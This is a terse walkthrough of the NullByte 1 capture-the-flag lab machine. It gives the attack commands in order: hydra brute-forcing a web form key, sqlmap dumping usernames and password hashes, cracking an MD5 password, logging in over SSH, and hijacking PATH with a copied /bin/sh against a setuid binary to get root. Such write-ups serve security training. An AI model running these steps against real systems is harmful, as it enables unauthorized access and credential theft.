NullByte 1


  • netdiscover
  • Nmap
  • Wfuzz
  • Nikto
  • Strings
  • Hydra


Use netdiscover to detect target IP address

netdiscover -i eth0 -r is the target.

Then run nmap to detect opening ports and running services on the target machine.

nmap -sV -v -O -A -T5 -p-

use Nikto to scan

nikto -h

find phpMyAdmin directory

use wfuzz to scan

wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt --hc 404 2>/dev/null

check the page:

just a gif image. Download it and use strings to check

strings main.gif

find P-): kzMb5nVYJw, try

check the source:

use hydra to crack the key:

hydra http-form-post "/kzMb5nVYJw/index.php:key=^PASS^&:invalid key" -P /usr/share/wordlists/rockyou.txt -la -t 10 -w 30

got key is elite

enter the key, now we have another page:

use sqlmap to get database name: sqlmap -u "" -p usrtosearch --dbs

use sqlmap to get tables of database mysql:

sqlmap -u "" -p usrtosearch --dbms mysql -D mysql --tables

get column name of table user

sqlmap -u "" -p usrtosearch --dbms mysql -D mysql -T user --columns

get Username and Password

sqlmap -u "" -p usrtosearch --dbms mysql -D mysql -T user -C User,Password --dump

sqlmap -u "" -p usrtosearch --dbms mysql -D seth --tables

sqlmap -u "" -p usrtosearch --dbms mysql -D seth -T users --columns

sqlmap -u "" -p usrtosearch --dbms mysql -D seth -T users -C user,pass --dump

for ramses’s password, it looks like md5, google it, go to md5decoder get omega.

use this to login ssh

ssh ramses@ -p 777

get the shell:

try command history

find it

find / -name "procwatch" 2>/dev/null

in /var/www/backup/procwatch, backup, good.

check the file

ls -alh /var/www/backup/procwatch

found it’s setuid

run it

find it just run sh and ps

copy /bin/sh to /var/www/backup

cp /bin/sh /var/www/backup/ps

add it to PATH

export PATH=/var/www/backup:$PATH
echo $PATH

run it ./procwatch get root